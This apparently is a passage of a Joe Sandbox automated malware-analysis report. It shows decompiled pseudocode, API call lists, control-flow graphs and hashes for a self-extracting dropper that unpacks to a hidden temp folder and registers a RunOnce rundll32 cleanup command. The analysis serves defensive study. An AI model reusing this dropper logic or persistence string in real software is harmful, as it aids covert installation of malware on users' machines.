                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00212134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 0021215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0021218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002121C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002121E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0021223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 178549006-850274211
                                                                                                                                                                                                        • Opcode ID: b4cdc473682922ecfed4a885e45fa049faaaa7a400add232bf49e09fab2847db
                                                                                                                                                                                                        • Instruction ID: ca3a63701e5f1d4541fdd4dae620b37b17beb855e2ba682204bdd12db5052156
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4cdc473682922ecfed4a885e45fa049faaaa7a400add232bf49e09fab2847db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42510571921214BBDB209F60EC4DFFB77BDEB75700F0041A4BA49A2151DE718EE98A50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 232 2155a0-2155d9 call 21468f LocalAlloc 235 2155db-2155f1 call 2144b9 call 216285 232->235 236 2155fd-21560c call 21468f 232->236 251 2155f6-2155f8 235->251 241 215632-215643 lstrcmpA 236->241 242 21560e-215630 call 2144b9 LocalFree 236->242 245 215645 241->245 246 21564b-215659 LocalFree 241->246 242->251 245->246 249 215696-21569c 246->249 250 21565b-21565d 246->250 252 2156a2-2156a8 249->252 253 21589f-2158b5 call 216517 249->253 254 215669 250->254 255 21565f-215667 250->255 256 2158b7-2158c7 call 216ce0 251->256 252->253 258 2156ae-2156c1 GetTempPathA 252->258 253->256 259 21566b-21567a call 215467 254->259 255->254 255->259 262 2156f3-215711 call 211781 258->262 263 2156c3-2156c9 call 215467 258->263 270 215680-215691 call 2144b9 259->270 271 21589b-21589d 259->271 275 215717-215729 GetDriveTypeA 262->275 276 21586c-215890 GetWindowsDirectoryA call 21597d 262->276 269 2156ce-2156d0 263->269 269->271 273 2156d6-2156df call 212630 269->273 270->251 271->256 273->262 288 2156e1-2156ed call 215467 273->288 277 215730-215740 GetFileAttributesA 275->277 278 21572b-21572e 275->278 276->262 289 215896 276->289 282 215742-215745 277->282 283 21577e-21578f call 21597d 277->283 278->277 278->282 286 215747-21574f 282->286 287 21576b 282->287 298 215791-21579e call 212630 283->298 299 2157b2-2157bf call 212630 283->299 291 215771-215779 286->291 292 215751-215753 286->292 287->291 288->262 288->271 289->271 296 215864-215866 291->296 292->291 295 215755-215762 call 216952 292->295 295->287 309 215764-215769 295->309 296->275 296->276 298->287 306 2157a0-2157b0 call 21597d 298->306 307 2157c1-2157cd GetWindowsDirectoryA 299->307 308 2157d3-2157f8 call 21658a GetFileAttributesA 299->308 306->287 306->299 307->308 314 21580a 308->314 315 2157fa-215808 
CreateDirectoryA 308->315 309->283 309->287 316 21580d-21580f 314->316 315->316 317 215811-215825 316->317 318 215827-21585c SetFileAttributesA call 211781 call 215467 316->318 317->296 318->271 323 21585e 318->323 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E002155A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E0021468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E0021468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0x219a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0x218b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0x218a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00216517(_t82, 0x7d2, 0, E00213210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x219a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0x2191e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0x2191e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00211781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00216952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E0021597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00212630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E0021658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0x2191e4;
                                                                                                                                                                                                        																					E00211781(0x2191e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00215467(0x2191e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00212630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E0021597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00215467(0x2191e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0x2191e4;
                                                                                                                                                                                                        											_t70 = E00212630(0, 0x2191e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0x2191e4;
                                                                                                                                                                                                        												_t71 = E00215467(0x2191e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E0021597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x218b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00215467(0x218b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E002144B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0x219124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00216CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x002156a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156ae
                                                                                                                                                                                                        0x002156ae
                                                                                                                                                                                                        0x002156b9
                                                                                                                                                                                                        0x002156bf
                                                                                                                                                                                                        0x002156c1
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x00215705
                                                                                                                                                                                                        0x0021570a
                                                                                                                                                                                                        0x00215711
                                                                                                                                                                                                        0x00215717
                                                                                                                                                                                                        0x00215724
                                                                                                                                                                                                        0x00215726
                                                                                                                                                                                                        0x00215729
                                                                                                                                                                                                        0x00215730
                                                                                                                                                                                                        0x00215737
                                                                                                                                                                                                        0x0021573d
                                                                                                                                                                                                        0x00215740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021572b
                                                                                                                                                                                                        0x0021572b
                                                                                                                                                                                                        0x0021572e
                                                                                                                                                                                                        0x00215742
                                                                                                                                                                                                        0x00215742
                                                                                                                                                                                                        0x00215745
                                                                                                                                                                                                        0x0021576b
                                                                                                                                                                                                        0x0021576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215747
                                                                                                                                                                                                        0x00215747
                                                                                                                                                                                                        0x0021574d
                                                                                                                                                                                                        0x0021574f
                                                                                                                                                                                                        0x00215771
                                                                                                                                                                                                        0x00215771
                                                                                                                                                                                                        0x00215773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215751
                                                                                                                                                                                                        0x00215751
                                                                                                                                                                                                        0x00215753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215755
                                                                                                                                                                                                        0x0021575b
                                                                                                                                                                                                        0x00215760
                                                                                                                                                                                                        0x00215762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215764
                                                                                                                                                                                                        0x00215764
                                                                                                                                                                                                        0x00215769
                                                                                                                                                                                                        0x0021577e
                                                                                                                                                                                                        0x0021577e
                                                                                                                                                                                                        0x00215781
                                                                                                                                                                                                        0x00215788
                                                                                                                                                                                                        0x0021578d
                                                                                                                                                                                                        0x0021578f
                                                                                                                                                                                                        0x002157b2
                                                                                                                                                                                                        0x002157b8
                                                                                                                                                                                                        0x002157bd
                                                                                                                                                                                                        0x002157bf
                                                                                                                                                                                                        0x002157cd
                                                                                                                                                                                                        0x002157cd
                                                                                                                                                                                                        0x002157dd
                                                                                                                                                                                                        0x002157e3
                                                                                                                                                                                                        0x002157ef
                                                                                                                                                                                                        0x002157f5
                                                                                                                                                                                                        0x002157f8
                                                                                                                                                                                                        0x0021580a
                                                                                                                                                                                                        0x0021580a
                                                                                                                                                                                                        0x002157fa
                                                                                                                                                                                                        0x00215802
                                                                                                                                                                                                        0x00215802
                                                                                                                                                                                                        0x0021580d
                                                                                                                                                                                                        0x0021580f
                                                                                                                                                                                                        0x00215830
                                                                                                                                                                                                        0x00215836
                                                                                                                                                                                                        0x0021583d
                                                                                                                                                                                                        0x0021584b
                                                                                                                                                                                                        0x00215851
                                                                                                                                                                                                        0x00215855
                                                                                                                                                                                                        0x0021585a
                                                                                                                                                                                                        0x0021585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x00215811
                                                                                                                                                                                                        0x00215817
                                                                                                                                                                                                        0x00215819
                                                                                                                                                                                                        0x0021581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021581f
                                                                                                                                                                                                        0x00215791
                                                                                                                                                                                                        0x00215797
                                                                                                                                                                                                        0x0021579c
                                                                                                                                                                                                        0x0021579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002157a0
                                                                                                                                                                                                        0x002157a9
                                                                                                                                                                                                        0x002157ae
                                                                                                                                                                                                        0x002157b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002157b0
                                                                                                                                                                                                        0x0021579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215769
                                                                                                                                                                                                        0x00215762
                                                                                                                                                                                                        0x00215753
                                                                                                                                                                                                        0x0021574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156c3
                                                                                                                                                                                                        0x002156c5
                                                                                                                                                                                                        0x002156c9
                                                                                                                                                                                                        0x002156ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 002155CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00215638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0021564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00215620
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 002156B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0021571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00215737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 002157CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 002157EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00215802
                                                                                                                                                                                                          • Part of subcall function 00212630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00212654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00215830
                                                                                                                                                                                                          • Part of subcall function 00216517: FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                          • Part of subcall function 00216517: LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                          • Part of subcall function 00216517: DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                          • Part of subcall function 00216517: FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00215878
                                                                                                                                                                                                          • Part of subcall function 0021597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002159A8
                                                                                                                                                                                                          • Part of subcall function 0021597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 002159AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-337015389
                                                                                                                                                                                                        • Opcode ID: d6967f7396229c1cbef87cb06b52d3540cc7916dd32b8bec16a133b36c2ac81d
                                                                                                                                                                                                        • Instruction ID: 15d907fde564d263e61c931e2f0ca1500665d1f6e2f62a1c1fc8305c10d8a626
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6967f7396229c1cbef87cb06b52d3540cc7916dd32b8bec16a133b36c2ac81d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20811B70A24A25DADB20AF749C99BFA72ED9BF4300F4440E5F586D21D1DF708DE28E51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
